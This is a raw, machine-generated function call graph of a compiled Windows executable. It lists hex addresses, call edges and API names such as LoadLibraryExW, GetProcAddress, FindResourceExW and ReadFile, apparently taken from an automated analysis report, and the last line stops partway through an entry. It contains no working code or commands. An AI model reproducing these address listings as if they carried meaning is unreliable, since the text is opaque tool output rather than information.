103855 713334 103854->103855 103857 713339 Mailbox 103854->103857 104512 71342c 48 API calls 103855->104512 103860 713347 103857->103860 104513 71346e 48 API calls 103857->104513 103859 73010a 48 API calls 103862 7133d8 103859->103862 103860->103859 103861 713422 103860->103861 103861->103672 103863 73010a 48 API calls 103862->103863 103864 7133e3 103863->103864 103864->103672 103864->103864 103866 721606 103865->103866 103868 7214b2 103865->103868 103866->103678 103867 7214be 103872 7214c9 103867->103872 104515 71346e 48 API calls 103867->104515 103868->103867 103870 73010a 48 API calls 103868->103870 103871 785299 103870->103871 103873 73010a 48 API calls 103871->103873 103874 72156d 103872->103874 103875 73010a 48 API calls 103872->103875 103880 7852a4 103873->103880 103874->103678 103876 7215af 103875->103876 103877 7215c2 103876->103877 104514 72d6b4 48 API calls 103876->104514 103877->103678 103879 73010a 48 API calls 103879->103880 103880->103867 103880->103879 103881->103678 103882->103665 103884 71b8a7 48 API calls 103883->103884 103885 71a501 103884->103885 103885->103804 103886->103812 103887->103801 103953 713f5d 103888->103953 103893 713fc6 LoadLibraryExW 103963 713e78 103893->103963 103894 785830 103896 713e39 84 API calls 103894->103896 103898 785837 103896->103898 103900 713e78 3 API calls 103898->103900 103902 78583f 103900->103902 103901 713fed 103901->103902 103903 713ff9 103901->103903 103989 71417d 103902->103989 103905 713e39 84 API calls 103903->103905 103907 7134e2 103905->103907 103907->103816 103912 75cc82 103907->103912 103909 785866 103995 7141cb 103909->103995 103911 785873 103913 7141a7 83 API calls 103912->103913 103914 75ccf1 103913->103914 104286 75ce59 94 API calls 2 library calls 103914->104286 103916 75cd03 103917 71417d 64 API calls 103916->103917 103945 75cd07 103916->103945 103918 75cd1e 103917->103918 103919 71417d 64 API calls 103918->103919 103920 75cd2e 103919->103920 103921 71417d 64 API calls 103920->103921 103922 75cd49 103921->103922 103923 71417d 64 API calls 103922->103923 103924 75cd64 103923->103924 103925 7141a7 83 API calls 103924->103925 103926 75cd7b 103925->103926 103927 7345ec _W_store_winword 47 API calls 103926->103927 103928 75cd82 103927->103928 103929 7345ec _W_store_winword 47 API calls 103928->103929 103930 75cd8c 103929->103930 103931 71417d 64 API calls 103930->103931 103932 75cda0 103931->103932 104287 75c846 GetSystemTimeAsFileTime 103932->104287 103934 75cdb3 103935 75cddd 103934->103935 103936 75cdc8 103934->103936 103938 75cde3 103935->103938 103939 75ce42 103935->103939 103937 7328ca _free 47 API calls 103936->103937 103940 75cdce 103937->103940 104288 75c251 103938->104288 103942 7328ca _free 47 API calls 103939->103942 103943 7328ca _free 47 API calls 103940->103943 103942->103945 103943->103945 103945->103822 103947 713e39 103945->103947 103946 7328ca _free 47 API calls 103946->103945 103948 713e43 103947->103948 103949 713e4a 103947->103949 103950 734274 __fcloseall 83 API calls 103948->103950 103951 713e59 103949->103951 103952 713e6a FreeLibrary 103949->103952 103950->103949 103951->103822 103952->103951 104000 713f20 103953->104000 103956 713f85 103958 713f96 103956->103958 103959 713f8d FreeLibrary 103956->103959 103960 734129 103958->103960 103959->103958 104008 73413e 103960->104008 103962 713fba 103962->103893 103962->103894 104087 713eb3 103963->104087 103966 713e9f 103968 713eb1 103966->103968 103969 713ea8 FreeLibrary 103966->103969 103970 714010 103968->103970 103969->103968 103971 73010a 48 API calls 103970->103971 103972 714025 103971->103972 104095 714bce 103972->104095 103974 714031 _memmove 103975 71406c 103974->103975 103977 714161 103974->103977 103978 714129 103974->103978 103976 7141cb 57 API calls 103975->103976 103985 714075 103976->103985 104109 75d03f 93 API calls 103977->104109 104098 7131f2 CreateStreamOnHGlobal 103978->104098 103981 71417d 64 API calls 103981->103985 103983 714109 103983->103901 103984 785794 103986 7141a7 83 API calls 103984->103986 103985->103981 103985->103983 103985->103984 104104 7141a7 103985->104104 103987 7857a8 103986->103987 103988 71417d 64 API calls 103987->103988 103988->103983 103990 78587d 103989->103990 103991 71418f 103989->103991 104133 7344ae 103991->104133 103994 75c846 GetSystemTimeAsFileTime 103994->103909 103996 7858bf 103995->103996 103997 7141da 103995->103997 104268 734af5 103997->104268 103999 7141e2 103999->103911 104004 713f32 104000->104004 104003 713f08 LoadLibraryA GetProcAddress 104003->103956 104005 713f28 104004->104005 104006 713f3b LoadLibraryA 104004->104006 104005->103956 104005->104003 104006->104005 104007 713f4c GetProcAddress 104006->104007 104007->104005 104011 73414a __freefls@4 104008->104011 104009 73415d 104056 73889e 47 API calls __getptd_noexit 104009->104056 104011->104009 104013 73418e 104011->104013 104012 734162 104057 737aa0 8 API calls __wmakepath_s 104012->104057 104027 73f278 104013->104027 104016 734193 104017 7341a9 104016->104017 104018 73419c 104016->104018 104019 7341d3 104017->104019 104020 7341b3 104017->104020 104058 73889e 47 API calls __getptd_noexit 104018->104058 104041 73f390 104019->104041 104059 73889e 47 API calls __getptd_noexit 104020->104059 104024 73416d @_EH4_CallFilterFunc@8 __freefls@4 104024->103962 104028 73f284 __freefls@4 104027->104028 104029 738984 __lock 47 API calls 104028->104029 104030 73f292 104029->104030 104031 73f309 104030->104031 104036 738a0c __mtinitlocknum 47 API calls 104030->104036 104039 73f302 104030->104039 104064 735ade 48 API calls __lock 104030->104064 104065 735b48 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 104030->104065 104066 737660 47 API calls _W_store_winword 104031->104066 104034 73f310 104035 73f31f InitializeCriticalSectionAndSpinCount RtlEnterCriticalSection 104034->104035 104034->104039 104035->104039 104036->104030 104038 73f37c __freefls@4 104038->104016 104061 73f387 104039->104061 104050 73f3b0 __wopenfile 104041->104050 104042 73f3ca 104071 73889e 47 API calls __getptd_noexit 104042->104071 104043 73f585 104043->104042 104048 73f5e8 104043->104048 104045 73f3cf 104072 737aa0 8 API calls __wmakepath_s 104045->104072 104047 7341de 104060 734200 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104047->104060 104068 747179 104048->104068 104050->104042 104050->104043 104073 73247b 59 API calls 2 library calls 104050->104073 104052 73f57e 104052->104043 104074 73247b 59 API calls 2 library calls 104052->104074 104054 73f59d 104054->104043 104075 73247b 59 API calls 2 library calls 104054->104075 104056->104012 104057->104024 104058->104024 104059->104024 104060->104024 104067 738ae8 RtlLeaveCriticalSection 104061->104067 104063 73f38e 104063->104038 104064->104030 104065->104030 104066->104034 104067->104063 104076 746961 104068->104076 104070 747192 104070->104047 104071->104045 104072->104047 104073->104052 104074->104054 104075->104043 104079 74696d __freefls@4 104076->104079 104077 74697f 104078 73889e __wmakepath_s 47 API calls 104077->104078 104080 746984 104078->104080 104079->104077 104081 7469b6 104079->104081 104082 737aa0 __wmakepath_s 8 API calls 104080->104082 104083 746a28 __wsopen_helper 110 API calls 104081->104083 104086 74698e __freefls@4 104082->104086 104084 7469d3 104083->104084 104085 7469fc __wsopen_helper RtlLeaveCriticalSection 104084->104085 104085->104086 104086->104070 104091 713ec5 104087->104091 104090 713ef0 LoadLibraryA GetProcAddress 104090->103966 104092 713e91 104091->104092 104093 713ece LoadLibraryA 104091->104093 104092->103966 104092->104090 104093->104092 104094 713edf GetProcAddress 104093->104094 104094->104092 104096 73010a 48 API calls 104095->104096 104097 714be0 104096->104097 104097->103974 104099 713229 104098->104099 104100 71320c FindResourceExW 104098->104100 104099->103975 104100->104099 104101 7857d3 LoadResource 104100->104101 104101->104099 104102 7857e8 SizeofResource 104101->104102 104102->104099 104103 7857fc LockResource 104102->104103 104103->104099 104105 78589d 104104->104105 104106 7141b6 104104->104106 104110 73471d 104106->104110 104108 7141c4 104108->103985 104109->103975 104113 734729 __freefls@4 104110->104113 104111 734737 104123 73889e 47 API calls __getptd_noexit 104111->104123 104113->104111 104114 73475d 104113->104114 104125 735a9f 104114->104125 104115 73473c 104124 737aa0 8 API calls __wmakepath_s 104115->104124 104118 734763 104131 73468e 81 API calls 5 library calls 104118->104131 104120 734772 104132 734794 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104120->104132 104122 734747 __freefls@4 104122->104108 104123->104115 104124->104122 104126 735ad1 RtlEnterCriticalSection 104125->104126 104127 735aaf 104125->104127 104129 735ac7 104126->104129 104127->104126 104128 735ab7 104127->104128 104130 738984 __lock 47 API calls 104128->104130 104129->104118 104130->104129 104131->104120 104132->104122 104136 7344c9 104133->104136 104135 7141a0 104135->103994 104137 7344d5 __freefls@4 104136->104137 104138 7344eb _memset 104137->104138 104139 734518 104137->104139 104141 734510 __freefls@4 104137->104141 104163 73889e 47 API calls __getptd_noexit 104138->104163 104140 735a9f __lock_file 48 API calls 104139->104140 104142 73451e 104140->104142 104141->104135 104149 7342eb 104142->104149 104145 734505 104164 737aa0 8 API calls __wmakepath_s 104145->104164 104151 734306 _memset 104149->104151 104155 734321 104149->104155 104150 734311 104264 73889e 47 API calls __getptd_noexit 104150->104264 104151->104150 104151->104155 104160 73435f 104151->104160 104153 734316 104265 737aa0 8 API calls __wmakepath_s 104153->104265 104165 734552 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104155->104165 104157 734470 _memset 104267 73889e 47 API calls __getptd_noexit 104157->104267 104160->104155 104160->104157 104166 7335c3 104160->104166 104173 73fbbf 104160->104173 104244 73f916 104160->104244 104266 73fa37 47 API calls 3 library calls 104160->104266 104163->104145 104164->104141 104165->104141 104167 7335e2 104166->104167 104168 7335cd 104166->104168 104167->104160 104169 73889e __wmakepath_s 47 API calls 104168->104169 104170 7335d2 104169->104170 104171 737aa0 __wmakepath_s 8 API calls 104170->104171 104172 7335dd 104171->104172 104172->104160 104174 73fbe0 104173->104174 104175 73fbf7 104173->104175 104177 73886a __lseeki64 47 API calls 104174->104177 104176 74032f 104175->104176 104180 73fc31 104175->104180 104178 73886a __lseeki64 47 API calls 104176->104178 104179 73fbe5 104177->104179 104181 740334 104178->104181 104182 73889e __wmakepath_s 47 API calls 104179->104182 104183 73fc39 104180->104183 104191 73fc50 104180->104191 104184 73889e __wmakepath_s 47 API calls 104181->104184 104187 73fbec 104182->104187 104185 73886a __lseeki64 47 API calls 104183->104185 104186 73fc45 104184->104186 104188 73fc3e 104185->104188 104189 737aa0 __wmakepath_s 8 API calls 104186->104189 104187->104160 104193 73889e __wmakepath_s 47 API calls 104188->104193 104189->104187 104190 73fc65 104194 73886a __lseeki64 47 API calls 104190->104194 104191->104187 104191->104190 104192 73fc7f 104191->104192 104196 73fc9d 104191->104196 104192->104190 104195 73fc8a 104192->104195 104193->104186 104194->104188 104200 7449a2 __stbuf 47 API calls 104195->104200 104198 737660 __malloc_crt 47 API calls 104196->104198 104199 73fcad 104198->104199 104201 73fcd0 104199->104201 104202 73fcb5 104199->104202 104203 73fd9e 104200->104203 104205 7405df __lseeki64_nolock 49 API calls 104201->104205 104206 73889e __wmakepath_s 47 API calls 104202->104206 104204 73fe17 ReadFile 104203->104204 104207 73fdb4 GetConsoleMode 104203->104207 104209 7402f7 GetLastError 104204->104209 104210 73fe39 104204->104210 104208 73fcde 104205->104208 104211 73fcba 104206->104211 104212 73fe14 104207->104212 104213 73fdc8 104207->104213 104208->104195 104214 740304 104209->104214 104215 73fdf7 104209->104215 104210->104209 104219 73fe09 104210->104219 104216 73886a __lseeki64 47 API calls 104211->104216 104212->104204 104213->104212 104217 73fdce ReadConsoleW 104213->104217 104218 73889e __wmakepath_s 47 API calls 104214->104218 104223 73887d __dosmaperr 47 API calls 104215->104223 104226 73fdfd 104215->104226 104220 73fcc5 104216->104220 104217->104219 104222 73fdf1 GetLastError 104217->104222 104221 740309 104218->104221 104219->104226 104227 73fe6e 104219->104227 104235 7400db 104219->104235 104220->104187 104224 73886a __lseeki64 47 API calls 104221->104224 104222->104215 104223->104226 104224->104226 104225 7328ca _free 47 API calls 104225->104187 104226->104187 104226->104225 104229 73feda ReadFile 104227->104229 104237 73ff5b 104227->104237 104231 73fefb GetLastError 104229->104231 104242 73ff05 104229->104242 104230 7401e1 ReadFile 104236 740204 GetLastError 104230->104236 104243 740212 104230->104243 104231->104242 104232 740018 104238 73ffc8 MultiByteToWideChar 104232->104238 104239 7405df __lseeki64_nolock 49 API calls 104232->104239 104233 740008 104234 73889e __wmakepath_s 47 API calls 104233->104234 104234->104226 104235->104226 104235->104230 104236->104243 104237->104226 104237->104232 104237->104233 104237->104238 104238->104222 104238->104226 104239->104238 104240 7405df __lseeki64_nolock 49 API calls 104240->104242 104241 7405df __lseeki64_nolock 49 API calls 104241->104243 104242->104227 104242->104240 104243->104235 104243->104241 104245 73f921 104244->104245 104249 73f936 104244->104249 104246 73889e __wmakepath_s 47 API calls 104245->104246 104247 73f926 104246->104247 104248 737aa0 __wmakepath_s 8 API calls 104247->104248 104258 73f931 104248->104258 104250 73f96b 104249->104250 104251 744bd4 __getbuf 47 API calls 104249->104251 104249->104258 104252 7335c3 __stbuf 47 API calls 104250->104252 104251->104250 104253 73f97f 104252->104253 104254 73fab6 __filbuf 62 API calls 104253->104254 104255 73f986 104254->104255 104256 7335c3 __stbuf 47 API calls 104255->104256 104255->104258 104257 73f9a9 104256->104257 104257->104258 104259 7335c3 __stbuf 47 API calls 104257->104259 104258->104160 104260 73f9b5 104259->104260 104260->104258 104261 7335c3 __stbuf 47 API calls 104260->104261 104262 73f9c2 104261->104262 104263 7335c3 __stbuf 47 API calls 104262->104263 104263->104258 104264->104153 104265->104155 104266->104160 104267->104153 104269 734b01 __freefls@4 104268->104269 104270 734b24 104269->104270 104271 734b0f 104269->104271 104273 735a9f __lock_file 48 API calls 104270->104273 104282 73889e 47 API calls __getptd_noexit 104271->104282 104275 734b2a 104273->104275 104274 734b14 104283 737aa0 8 API calls __wmakepath_s 104274->104283 104284 73479c 55 API calls 6 library calls 104275->104284 104278 734b35 104285 734b55 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104278->104285 104280 734b47 104281 734b1f __freefls@4 104280->104281 104281->103999 104282->104274 104283->104281 104284->104278 104285->104280 104286->103916 104287->103934 104289 75c25c 104288->104289 104290 75c26a 104288->104290 104291 734129 117 API calls 104289->104291 104292 75c2af 104290->104292 104293 734129 117 API calls 104290->104293 104312 75c273 104290->104312 104291->104290 104319 75c4d4 104292->104319 104294 75c294 104293->104294 104294->104292 104296 75c29d 104294->104296 104300 734274 __fcloseall 83 API calls 104296->104300 104296->104312 104297 75c2f3 104298 75c2f7 104297->104298 104299 75c318 104297->104299 104302 75c304 104298->104302 104304 734274 __fcloseall 83 API calls 104298->104304 104323 75c0d1 104299->104323 104300->104312 104305 734274 __fcloseall 83 API calls 104302->104305 104302->104312 104304->104302 104305->104312 104306 75c346 104332 75c376 104306->104332 104307 75c326 104309 75c333 104307->104309 104311 734274 __fcloseall 83 API calls 104307->104311 104309->104312 104314 734274 __fcloseall 83 API calls 104309->104314 104311->104309 104312->103946 104314->104312 104317 75c361 104317->104312 104318 734274 __fcloseall 83 API calls 104317->104318 104318->104312 104320 75c4e2 _memmove _W_expandtime 104319->104320 104321 75c4f9 104319->104321 104320->104297 104322 7344ae __fread_nolock 64 API calls 104321->104322 104322->104320 104324 7345ec _W_store_winword 47 API calls 104323->104324 104325 75c0e0 104324->104325 104326 7345ec _W_store_winword 47 API calls 104325->104326 104327 75c0f4 104326->104327 104328 7345ec _W_store_winword 47 API calls 104327->104328 104329 75c108 104328->104329 104330 75c450 47 API calls 104329->104330 104331 75c11b 104329->104331 104330->104331 104331->104306 104331->104307 104338 75c38c 104332->104338 104333 75c43d 104361 75c676 104333->104361 104335 75c34d 104340 75c450 104335->104340 104337 75c12d 64 API calls 104337->104338 104338->104333 104338->104335 104338->104337 104365 75c22e 64 API calls 104338->104365 104366 75c553 80 API calls 104338->104366 104341 75c45d 104340->104341 104345 75c463 104340->104345 104342 7328ca _free 47 API calls 104341->104342 104342->104345 104343 75c354 104343->104317 104348 734274 104343->104348 104344 75c474 104344->104343 104347 7328ca _free 47 API calls 104344->104347 104345->104344 104346 7328ca _free 47 API calls 104345->104346 104346->104344 104347->104343 104349 734280 __freefls@4 104348->104349 104350 734294 104349->104350 104351 7342ac 104349->104351 104411 73889e 47 API calls __getptd_noexit 104350->104411 104353 735a9f __lock_file 48 API calls 104351->104353 104358 7342a4 __freefls@4 104351->104358 104355 7342be 104353->104355 104354 734299 104412 737aa0 8 API calls __wmakepath_s 104354->104412 104395 734208 104355->104395 104358->104317 104362 75c683 104361->104362 104363 75c694 104361->104363 104367 73373e 104362->104367 104363->104335 104365->104338 104366->104338 104369 73374a __freefls@4 104367->104369 104368 733774 __freefls@4 104368->104363 104369->104368 104370 733764 104369->104370 104371 73377c 104369->104371 104392 73889e 47 API calls __getptd_noexit 104370->104392 104373 735a9f __lock_file 48 API calls 104371->104373 104375 733782 104373->104375 104374 733769 104393 737aa0 8 API calls __wmakepath_s 104374->104393 104380 7335e7 104375->104380 104383 7335f6 104380->104383 104386 733614 104380->104386 104381 733604 104382 73889e __wmakepath_s 47 API calls 104381->104382 104384 733609 104382->104384 104383->104381 104383->104386 104390 73362c _memmove 104383->104390 104385 737aa0 __wmakepath_s 8 API calls 104384->104385 104385->104386 104394 7337b4 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104386->104394 104387 739af3 __swprintf 78 API calls 104387->104390 104388 733914 __flush 78 API calls 104388->104390 104389 7335c3 __stbuf 47 API calls 104389->104390 104390->104386 104390->104387 104390->104388 104390->104389 104391 73bd14 __flswbuf 78 API calls 104390->104391 104391->104390 104392->104374 104393->104368 104394->104368 104396 734217 104395->104396 104397 73422b 104395->104397 104447 73889e 47 API calls __getptd_noexit 104396->104447 104409 734227 104397->104409 104414 733914 104397->104414 104400 73421c 104448 737aa0 8 API calls __wmakepath_s 104400->104448 104405 7335c3 __stbuf 47 API calls 104406 734245 104405->104406 104424 73f782 104406->104424 104408 73424b 104408->104409 104410 7328ca _free 47 API calls 104408->104410 104413 7342e3 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104409->104413 104410->104409 104411->104354 104412->104358 104413->104358 104415 733927 104414->104415 104419 73394b 104414->104419 104416 7335c3 __stbuf 47 API calls 104415->104416 104415->104419 104417 733944 104416->104417 104449 73bd14 104417->104449 104420 73f8e6 104419->104420 104421 73423f 104420->104421 104422 73f8f3 104420->104422 104421->104405 104422->104421 104423 7328ca _free 47 API calls 104422->104423 104423->104421 104425 73f78e __freefls@4 104424->104425 104426 73f796 104425->104426 104427 73f7ae 104425->104427 104498 73886a 47 API calls __getptd_noexit 104426->104498 104429 73f82b 104427->104429 104434 73f7d8 104427->104434 104502 73886a 47 API calls __getptd_noexit 104429->104502 104430 73f79b 104499 73889e 47 API calls __getptd_noexit 104430->104499 104433 73f830 104503 73889e 47 API calls __getptd_noexit 104433->104503 104474 73b6a0 104434->104474 104437 73f7de 104440 73f7f1 104437->104440 104441 73f7fc 104437->104441 104438 73f838 104504 737aa0 8 API calls __wmakepath_s 104438->104504 104483 73f84c 104440->104483 104500 73889e 47 API calls __getptd_noexit 104441->104500 104444 73f7f7 104501 73f823 RtlLeaveCriticalSection __unlock_fhandle 104444->104501 104445 73f7a3 __freefls@4 104445->104408 104447->104400 104448->104409 104450 73bd20 __freefls@4 104449->104450 104451 73bd40 104450->104451 104452 73bd28 104450->104452 104454 73bdd5 104451->104454 104459 73bd72 104451->104459 104453 73886a __lseeki64 47 API calls 104452->104453 104455 73bd2d 104453->104455 104456 73886a __lseeki64 47 API calls 104454->104456 104457 73889e __wmakepath_s 47 API calls 104455->104457 104458 73bdda 104456->104458 104467 73bd35 __freefls@4 104457->104467 104460 73889e __wmakepath_s 47 API calls 104458->104460 104461 73b6a0 ___lock_fhandle 49 API calls 104459->104461 104462 73bde2 104460->104462 104463 73bd78 104461->104463 104464 737aa0 __wmakepath_s 8 API calls 104462->104464 104465 73bd8b 104463->104465 104466 73bd9e 104463->104466 104464->104467 104469 73bdf6 __chsize_nolock 75 API calls 104465->104469 104468 73889e __wmakepath_s 47 API calls 104466->104468 104467->104419 104471 73bda3 104468->104471 104470 73bd97 104469->104470 104473 73bdcd __flswbuf RtlLeaveCriticalSection 104470->104473 104472 73886a __lseeki64 47 API calls 104471->104472 104472->104470 104473->104467 104476 73b6ac __freefls@4 104474->104476 104475 73b6f9 RtlEnterCriticalSection 104478 73b71f __freefls@4 104475->104478 104476->104475 104477 738984 __lock 47 API calls 104476->104477 104479 73b6d0 104477->104479 104478->104437 104480 73b6db InitializeCriticalSectionAndSpinCount 104479->104480 104481 73b6ed 104479->104481 104480->104481 104482 73b723 ___lock_fhandle RtlLeaveCriticalSection 104481->104482 104482->104475 104484 73b957 __close_nolock 47 API calls 104483->104484 104487 73f85a 104484->104487 104485 73f8b0 104486 73b8d1 __free_osfhnd 48 API calls 104485->104486 104489 73f8b8 104486->104489 104487->104485 104488 73f88e 104487->104488 104490 73b957 __close_nolock 47 API calls 104487->104490 104488->104485 104491 73b957 __close_nolock 47 API calls 104488->104491 104493 73f8da 104489->104493 104496 73887d __dosmaperr 47 API calls 104489->104496 104494 73f885 104490->104494 104492 73f89a CloseHandle 104491->104492 104492->104485 104495 73f8a6 GetLastError 104492->104495 104493->104444 104497 73b957 __close_nolock 47 API calls 104494->104497 104495->104485 104496->104493 104497->104488 104498->104430 104499->104445 104500->104444 104501->104445 104502->104433 104503->104438 104504->104445 104505->103830 104506->103833 104507->103837 104508->103843 104509->103850 104510->103852 104511->103849 104512->103857 104513->103860 104514->103877 104515->103872 104517 7131c7 104516->104517 104518 784aa5 GetFullPathNameW 104516->104518 104573 713bcf 104517->104573 104520 784abd 104518->104520 104521 7131cd GetFullPathNameW 104522 7131e7 104521->104522 104522->103684 104524 713a8b SHGetDesktopFolder 104523->104524 104526 713ade 104523->104526 104525 713a99 104524->104525 104524->104526 104525->104526 104527 713ac8 SHGetPathFromIDListW 104525->104527 104526->103686 104527->104526 104531 713ba9 104528->104531 104535 713b72 104528->104535 104529 731bc7 _W_store_winword 59 API calls 104529->104531 104530 713bcf 48 API calls 104532 713b7d 104530->104532 104531->104529 104533 7833e5 104531->104533 104531->104535 104577 71197e 104532->104577 104535->104530 104537 71197e 48 API calls 104538 713b9f 104537->104538 104539 713dcb 104538->104539 104540 713f9b 136 API calls 104539->104540 104541 713def 104540->104541 104542 7839f9 104541->104542 104543 713f9b 136 API calls 104541->104543 104544 75cc82 122 API calls 104542->104544 104545 713e02 104543->104545 104546 783a0e 104544->104546 104545->104542 104547 713e0a 104545->104547 104548 783a2f 104546->104548 104549 783a12 104546->104549 104551 783a1a 104547->104551 104552 713e16 104547->104552 104550 73010a 48 API calls 104548->104550 104553 713e39 84 API calls 104549->104553 104572 783a74 Mailbox 104550->104572 104608 75757b 87 API calls _wprintf 104551->104608 104607 71bdf0 163 API calls 8 library calls 104552->104607 104553->104551 104556 713e2e 104556->103688 104557 783a28 104557->104548 104558 783c24 104559 7328ca _free 47 API calls 104558->104559 104560 783c2c 104559->104560 104561 713e39 84 API calls 104560->104561 104566 783c35 104561->104566 104565 7328ca _free 47 API calls 104565->104566 104566->104565 104567 713e39 84 API calls 104566->104567 104610 7532b0 86 API calls 4 library calls 104566->104610 104567->104566 104569 71caee 48 API calls 104569->104572 104572->104558 104572->104566 104572->104569 104583 7530ac 104572->104583 104586 75a525 104572->104586 104592 71b6d0 104572->104592 104601 71a870 104572->104601 104609 752fcd 60 API calls 2 library calls 104572->104609 104574 713bd9 __NMSG_WRITE 104573->104574 104575 73010a 48 API calls 104574->104575 104576 713bee _wcscpy 104575->104576 104576->104521 104578 711990 104577->104578 104582 7119af _memmove 104577->104582 104580 73010a 48 API calls 104578->104580 104579 73010a 48 API calls 104581 7119c6 104579->104581 104580->104582 104581->104537 104582->104579 104584 73010a 48 API calls 104583->104584 104585 7530dc _memmove 104584->104585 104585->104572 104588 75a530 104586->104588 104587 73010a 48 API calls 104589 75a547 104587->104589 104588->104587 104590 75a556 104589->104590 104591 71caee 48 API calls 104589->104591 104590->104572 104591->104590 104593 71b789 104592->104593 104596 71b6e3 _memmove 104592->104596 104595 73010a 48 API calls 104593->104595 104594 73010a 48 API calls 104597 71b6ea 104594->104597 104595->104596 104596->104594 104598 71b71b 104597->104598 104599 73010a 48 API calls 104597->104599 104598->104572 104600 71b74d 104599->104600 104600->104572 104602 71a883 104601->104602 104605 71a93d 104601->104605 104604 73010a 48 API calls 104602->104604 104602->104605 104606 71a8c1 104602->104606 104603 73010a 48 API calls 104603->104606 104604->104606 104605->104572 104606->104603 104606->104605 104607->104556 104608->104557 104609->104572 104610->104566 104612 71a72c 104611->104612 104617 71a848 104611->104617 104613 73010a 48 API calls 104612->104613 104612->104617 104614 71a753 104613->104614 104615 73010a 48 API calls 104614->104615 104616 71a7c5 104615->104616 104616->104617 104620 71a870 48 API calls 104616->104620 104621 71b6d0 48 API calls 104616->104621 104624 71ace0 91 API calls 2 library calls 104616->104624 104625 75a3ee 48 API calls 104616->104625 104617->103694 104620->104616 104621->104616 104622->103696 104623->103698 104624->104616 104625->104616 104627 784ad8 EnumResourceNamesW 104626->104627 104628 7131a2 LoadImageW 104626->104628 104629 713118 RegisterClassExW 104627->104629 104628->104629 104630 712f58 GetSysColorBrush RegisterClassExW RegisterClipboardFormatW 104629->104630 104631 712fe9 LoadIconW 104630->104631 104633 71301e 104631->104633 104633->103713 104635 7844d1 104634->104635 104636 713618 104634->104636 104635->104636 104637 7844da DestroyCursor 104635->104637 104636->103718 104660 756237 61 API calls _W_store_winword 104636->104660 104637->104636 104639 713900 104638->104639 104659 7139d5 Mailbox 104638->104659 104661 717b6e 104639->104661 104642 78453f LoadStringW 104646 784559 104642->104646 104643 71391b 104644 717e53 48 API calls 104643->104644 104645 713930 104644->104645 104645->104646 104647 713941 104645->104647 104668 7139e8 48 API calls 2 library calls 104646->104668 104649 71394b 104647->104649 104650 7139da 104647->104650 104666 7139e8 48 API calls 2 library calls 104649->104666 104667 71c935 48 API calls 104650->104667 104653 784564 104654 784578 104653->104654 104656 713956 _memset _wcscpy 104653->104656 104669 7139e8 48 API calls 2 library calls 104654->104669 104658 7139ba Shell_NotifyIconW 104656->104658 104657 784586 104658->104659 104659->103723 104660->103718 104662 73010a 48 API calls 104661->104662 104663 717b93 104662->104663 104664 71a6f8 48 API calls 104663->104664 104665 71390e 104664->104665 104665->104642 104665->104643 104666->104656 104667->104656 104668->104653 104669->104657 104671 71e7fd 104670->104671 104672 71e80f 104670->104672 104800 71dcd0 378 API calls 2 library calls 104671->104800 104801 75d520 86 API calls 4 library calls 104672->104801 104674 71e806 104674->103746 104676 7898e8 104676->104676 104678 71ea20 104677->104678 104679 71fa40 378 API calls 104678->104679 104681 71ea89 104678->104681 104682 789919 104679->104682 104680 7899bc 104806 75d520 86 API calls 4 library calls 104680->104806 104687 71d3d2 48 API calls 104681->104687 104707 71eb18 104681->104707 104713 71ecd7 Mailbox 104681->104713 104682->104681 104803 75d520 86 API calls 4 library calls 104682->104803 104683 71fa40 378 API calls 104683->104713 104685 71d3d2 48 API calls 104688 789997 104685->104688 104690 789963 104687->104690 104805 731b2a 52 API calls __cinit 104688->104805 104804 731b2a 52 API calls __cinit 104690->104804 104691 71d380 55 API calls 104691->104713 104693 789d70 104815 76e2fb 378 API calls Mailbox 104693->104815 104695 789e49 104820 75d520 86 API calls 4 library calls 104695->104820 104696 789dc2 104817 75d520 86 API calls 4 library calls 104696->104817 104697 789ddf 104818 76c235 378 API calls Mailbox 104697->104818 104699 71342c 48 API calls 104699->104713 104705 789df7 104726 71ef0c Mailbox 104705->104726 104819 75d520 86 API calls 4 library calls 104705->104819 104706 7214a0 48 API calls 104706->104713 104707->104685 104707->104713 104709 71f56f 104709->104726 104816 75d520 86 API calls 4 library calls 104709->104816 104712 75d520 86 API calls 104712->104713 104713->104680 104713->104683 104713->104691 104713->104693 104713->104695 104713->104696 104713->104697 104713->104699 104713->104706 104713->104709 104713->104712 104714 789a3c 104713->104714 104713->104726 104802 71d805 48 API calls _memmove 104713->104802 104807 75a3ee 48 API calls 104713->104807 104808 76ede9 378 API calls 104713->104808 104813 74a599 InterlockedDecrement 104713->104813 104814 76f4df 378 API calls 104713->104814 104809 76d154 48 API calls 104714->104809 104716 789a48 104718 789a56 104716->104718 104719 789a9b 104716->104719 104810 75a485 48 API calls 104718->104810 104722 789a91 Mailbox 104719->104722 104811 75afce 48 API calls 104719->104811 104720 71fa40 378 API calls 104720->104726 104722->104720 104724 789ad8 104812 72df08 48 API calls 104724->104812 104726->103746 104728 724537 104727->104728 104729 72469f 104727->104729 104730 724543 104728->104730 104731 787820 104728->104731 104732 71caee 48 API calls 104729->104732 104868 724040 378 API calls _memmove 104730->104868 104869 76e713 378 API calls Mailbox 104731->104869 104739 7245e4 Mailbox 104732->104739 104735 78782c 104736 724639 Mailbox 104735->104736 104870 75d520 86 API calls 4 library calls 104735->104870 104736->103746 104738 724559 104738->104735 104738->104736 104738->104739 104742 713e39 84 API calls 104739->104742 104821 72dd84 104739->104821 104824 770c0e 104739->104824 104827 7601e4 104739->104827 104742->104736 104744->103746 104745->103746 104746->103746 104747->103746 104748->103727 104749->103731 104750->103736 104751->103746 104752->103746 104753->103746 104754->103755 104755->103755 104756->103755 104758 71fa60 104757->104758 104793 71fa8e Mailbox _memmove 104757->104793 104759 73010a 48 API calls 104758->104759 104759->104793 104760 72105e 105230 71c935 48 API calls 104760->105230 104762 720119 105235 75d520 86 API calls 4 library calls 104762->105235 104766 720dee 105224 71d89e 50 API calls Mailbox 104766->105224 104767 721063 105234 75d520 86 API calls 4 library calls 104767->105234 104769 78b772 105236 75d520 86 API calls 4 library calls 104769->105236 104770 720dfa 105225 71d89e 50 API calls Mailbox 104770->105225 104772 71c935 48 API calls 104772->104793 104775 720e83 104781 71caee 48 API calls 104775->104781 104776 71d3d2 48 API calls 104776->104793 104777 71fbf1 Mailbox 104777->103746 104779 78b7d2 104780 731b2a 52 API calls __cinit 